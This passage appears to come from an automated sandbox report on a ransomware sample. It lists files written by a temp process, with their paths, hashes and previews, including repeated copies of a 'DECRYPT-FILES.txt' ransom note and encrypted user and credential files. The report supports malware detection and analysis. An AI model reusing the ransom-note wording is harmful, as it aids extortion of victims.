~"!^.F..m'.\|J(..s....S.1#.....pJ.....n.M...V...zK...PH.....R.vB-..2.sa%..A.;..'.I...L..T.<...k....T./'..T.,......f.afW80w......../e\...O..UX.....$. ...p..j3_..g.s..'..~j..q..DHa.. .:....j.....%..Kl....o...DM[.s\j<.q.. ......Yaj..-.^........z..M...w..c,z..C.M.}h..#.b...h...pTC!\.\|%..C.`.(..#.3.~j.vV\.c[.F ....P..3

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\addressbook.acrodata Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.110520659201918
Encrypted:	false
MD5:	961CBA8A922D3CE8E38A171C8A4361DD
SHA1:	74566FD38A83E3D560B6EC30E202ECAB30BA9F66
SHA-256:	A3C8D06898B662D8833AB8014290A79E5A581BE14E5CB5D8E4C35AB8BCBFAE38
SHA-512:	548E0A7329E72B7F07463EFD67109145E70B23981CD40C7A23C844FE234B4C8A993F0273537BD30F1598319394B2C9104831EC60B65D6AC6C338955239E9DCF6
Malicious:	false
Preview:	2.^I.6..}...Iw...c3...G....-..<.T.dI.T....1........;........YMA.....@........-b..@r..>..^.......&..j...N..d....W...!....f.t.VUe(B#...h8X.....zNcg8.....\.1h.B2.M.'n1......X.....gsg.=.Jz.YU.;J....=o.....~3.(..i4.6../..........<.Q.w.......H.o.o....f.af

C:\Users\user\AppData\Roaming\Adobe\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	55128
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	8DF4EE855ADEC29A558C8FB7C91B2E49
SHA1:	041A7AF45D3794BBA505E7F86B09E8EEB7E6526B
SHA-256:	8E836FABC253A0A41FA1548A8EE72C211915DFBD998A7DC2A2D498B049F3009A
SHA-512:	E38037BB96D7E76A4274CA49A02F4491C8F50764686E1463800DE83866157A55CE70A8597BAEB1B1941180D4BE9EEC75A294AEEC450371DF9025F560EEEAEA2B
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Adobe\Flash Player\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	147008
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	EB0D1CFA09956E112834DBBFCCF51365
SHA1:	0D45A3179A3AAD5C91B4B4335EA77C84ED3C8485
SHA-256:	068A6656AA3BB49EADDF0C1FCC3C83F02252399579727E4CB42254C9F6F4A0BF
SHA-512:	4E1ACC9F2FD372E8B308000D57BEB9666FE88C7DEE37A6515D1105D44F4EE2AF388F8C7D7F35A641DA89CA7B5F442961B3F52494E06337575FCCC8687869DA93
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\4aacbf725e5908a192ccd61db75414d6_041d84af-7e76-450d-8340-55db3c73c359 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.5731658964719015
Encrypted:	false
MD5:	3E2310FD365BC8E81742B57528762579
SHA1:	152D25EEC1013A4BF4AA7B1E7B652FC402E8F7EB
SHA-256:	8866EF3A2F89B0203ED1BE6646AF335FDDB5AA7E1940EC10370255C656E2A66C
SHA-512:	C6BE13D332D3EAB48D26EB4F3A8F2AD3EEC09AE9F980293C9CBBA53B55324B6152A9CAF0A7019A087AC19DD93EFC6BB433FCB38972B4B7D73D3D53A528DA353B
Malicious:	false
Preview:	...o)h.&Hv.Kp.WBd...5..&.f.&......Vdu.....:..0....(....l.O.6%.R..7Gw.d.H....y..q.<...X...&.F..Fyj4..m..\|....h......>.r.!..-.....;...<..7.a...t.nA...T.7.;.........Cj..j.8}..}...I8NB.....g..s.>B..i...O.F...i.....+.J...wQ...F2...;....0R.I....x......f.afG.'..b..6(R....g.y.b..H.U.$)y..m[...MCQ....\#...C....Q...d..Q9.1....V.T#V&.]....qr0d= 9.}9..C~ksz..>..e..g..i.Z}L.....@.1.C..4.c.D..T..gG....>o.@QG.$c.....%y.....60/'.. G.c.C..Y..Q.r...`.-.&@<..(O."...k....1 ...!...?`......y...E.........p.8.C.....f.af

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.09012642440929
Encrypted:	false
MD5:	47F2B7AFDCBF398C71D2632D8B99CB76
SHA1:	0E852D73C6F380D070E474D9952B8830F35C7A80
SHA-256:	AFC9543E6BC6CBA045FD6258AD2B8A60760B16C1C8BCCE20AF064732EB3F9DC4
SHA-512:	2AC17710150285DB7F8A703900BB5267013BDE9E00735E5D3AAEDD1E636F95FD8C650D372CA00F2078BF3CBFB10B66FF13E56D69C550B28C355DDD687295F31B
Malicious:	false
Preview:	.!.)B5..7+..9.../..-.\58.vH.{...'a..{.A..9..........a.x.BEug.~..5.....}.T...i...e..co...t..uR.gC8=..f.!Pr.IxU.u.z..Q.....g%...:..r2j..P..'.b^..>..t.L.....N.>....T$...{rpa.v....:,e..0aE.._...^F7Y.<WS.@rq.l...k.)}..7..B.O.)..Tl....F...GC.2F......f.af

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	73504
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	A5B3C3D5564303303796AD1ECDCA06C7
SHA1:	0F35620C68D1A901AE692FF6476D74356F20EA82
SHA-256:	BEFA7403EE9E4C63502BF2CC0A0ED207A310AAD3BF1E661487628AF92390CC3E
SHA-512:	F56A84611D6E41DD28BAFFC8ABFEDDCEDE74F20CC5FD7EB96EC193A79C4F255C1664EC2E4DE48F7BA119F3B3A3A532B5FAD126FB742AB4EB59B6A34A0C56CCA4
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.109237718188143
Encrypted:	false
MD5:	01C5B14F26FC2EB67DF66EF1D02BD791
SHA1:	5035EB8688A69B10E8DEC13BA194C9392760D62C
SHA-256:	254BFCC14113BDF0E1D43E3224C02D437B7B9F3158D105512696A7395B018260
SHA-512:	95703663DEAE40D88BAF2F7BBCC8084634CF4C34C73C08C93711B514CEC310FDD9EFC3A5311D54BE6BD9F8A6F956E6AAE3161CE7529320CDFB1F43362842F4EB
Malicious:	false
Preview:	.A..E...2....dL.....^P.S.H~.....G".7K.m..5.d!.x.J.\|..(....qy..f.lm.u.<]40^........j0.VM...<....^....#zl.=..*dJ.V...C.}..L.o...v\.m..\J$.....Y.-vgJo%:L.9.ya..}q....(.q5}...d}d7y.@(&..J..O.L..R....'..rt.....a.!./y3q....,..o.....j...~.t8...q.......}..F....f.af

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Verdi.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 12 10:48:12 2019, mtime=Mon Aug 12 10:48:12 2019, atime=Wed Nov 6 12:02:37 2019, length=90732, window=hide
Size (bytes):	2008
Entropy (8bit):	4.553672659233365
Encrypted:	false
MD5:	B667DE14109A62822A622945E8196618
SHA1:	F16A13BF79E8FA08FE0C66E603A6DE496B896E1E
SHA-256:	C34D4C3AB7049D3F4BDCA51AFB5AAA633328507EB9BE6515A378F8CC97CD39B2
SHA-512:	E579DEA599A039DC075D2F391D383EB5AE847F84F91EEF8836A707962A7BAE3E3317017C1821841F3309991268BAE39830DB2F20F36934A3735B4B8CE01623C0
Malicious:	false
Preview:	L..................F.... ...8....Q..8....Q....v....lb...........................P.O. .:i.....+00.../C:\...................t.1......H.>..Users.`.......:...H.>...Z...............6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1......O.^..user~1..B.......H.9.O.^.........................l.u.k.e.t.a.y.l.o.r.....z.1......O.^..Desktop.d.......H.9.O.^...&...............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.lb..fOSh .Verdi.doc.@.......O.^.O.^....(....................V.e.r.d.i...d.o.c.......x...............-...8...[.............h.....C:\Users\..#...................\\377142\Users.user\Desktop\Verdi.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.V.e.r.d.i...d.o.c.........:..,.LB.)...Au...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.3.1.2.3.0.2.0.1.4.-.2.7.9.6.6.0.5.8.5.-.3.5.1.1.6.8.0.5.2.6.-.1.0.0.4.............`.......X.......377142..........p!.)..oL..?."$....@......5.....p!.)..oL..?."$....@......5.....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.204289172467691
Encrypted:	false
MD5:	20E4A2ED706AFF1D1403251E673F9183
SHA1:	2433056795C6C3ACC4F9B28BAF72A10510503720
SHA-256:	B025EB24239A16621544026396442EFF1241A8F629A1CFB8C75EF8BE7379D1DB
SHA-512:	EE8E8329F97DF8FA5EF1D3A99DEE7E451DE57346B989DD7B7B309FB26FD15569E15828F8A9ED5FFE2368200928BABDC960F4B01EF23BC817614E36A7B2D5A4A4
Malicious:	false
Preview:	mE.J.X.?,$..F..b.G..ZZ.E'..{z.t....P.^...-zc!x...W"Z..#.}..zO>. ..{.@. .H.1u...."....]D...$T..F\.c...J........y3G...5.?c.\|.._.X..:ga..{.G.."..V8......8...d.sn7.a\|.E...F.Q3.f..{.P..;@..z^..F...#q.iN....... ;..r.U.."..."E...`......}(....p.R....f.af

C:\Users\user\AppData\Roaming\Microsoft\Proof\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.0503907236681025
Encrypted:	false
MD5:	3CF4448D4E2AA890ED77709DFF0EB469
SHA1:	CFCBCF9B332D2D828853D28D355BFFCA21FD0E8A
SHA-256:	D7A2BF9E727F87C1E47BEA229B79809682D5E2459E75F19EBC34D8B63EE51463
SHA-512:	6F665E360DE1ABDA0E35946DE6DCE84D860AF35DB064CB07225B2111C69057A2FDD8BFFC37964FB7B634A61A01E332CF398E29307DAB9700ACCC3DBE31D83BBA
Malicious:	false
Preview:	...fc.q.........w.w.J.."......_..'../.....E.+...;...\|2..1D..@..,kf...$........1.../...I.K,o.D.x............Z.V).b_...~.Z.w...>..{\|....'....Y58.+OK.@........g.....U.AV...$..kN..y..X"...g",m.Yw...ja..D.1.B].$WF..._a.....t.9.Idn.k.B..h...w.*....f.af

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\2871d795-bd9f-4b69-af3e-0e6587a4f337 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.782988934801813
Encrypted:	false
MD5:	BBB083C90B6B1DD084C2521EDC28EDC9
SHA1:	BCD32BF633CD0E27D7B95658E8E2B98B684B334F
SHA-256:	6CA73BABE64C1A259BB871441445AF45D1038462009CE567CBAD2A7828579BEB
